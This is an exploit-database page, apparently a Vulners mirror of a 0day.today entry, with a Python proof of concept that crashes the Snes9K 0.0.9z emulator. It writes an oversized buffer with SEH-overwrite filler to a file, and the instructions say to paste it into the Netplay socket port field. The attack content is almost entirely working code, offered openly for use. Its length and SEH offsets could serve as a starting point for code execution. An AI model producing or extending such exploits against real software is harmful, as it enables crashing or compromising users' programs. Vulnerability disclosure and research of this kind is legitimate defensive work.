Lucene search
K

Snes9K 0.0.9z - Denial of Service (PoC) Exploit

🗓️ 01 Oct 2018 00:00:00Reported by Crash_ManucootType 
zdt
 zdt
🔗 0day.today👁 16 Views

Snes9K 0.0.9z - Denial of Service (PoC) Exploit. Windows 7 Home Premium x86 SPANISH. Netplay-Options-paste contents of open.txt in Socket Port Numbe

Code
# Exploit Title: Snes9K 0.0.9z - Denial of Service (PoC)
# Exploit Author: crash_manucoot
# Vendor Homepage: https://sourceforge.net/projects/snes9k/
# Software Link: https://sourceforge.net/projects/snes9k/files/latest/download
# Version: 0.0.9z
# Tested on: Windows 7 Home Premium x86 SPANISH
# Category: Windows Local Exploit
# How to use: open the program go to Netplay-Options-paste the contents of open.txt 
# in the Socket Port Number and Boom 
 
buffer = "A" * 260
nseh = "B" * 4
seh = "C" * 4
junk = "D" * 300
 
evil = buffer + nseh + seh + junk
 
file = open('open.txt','w+')
file.write(evil)

#  0day.today [2018-10-02]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation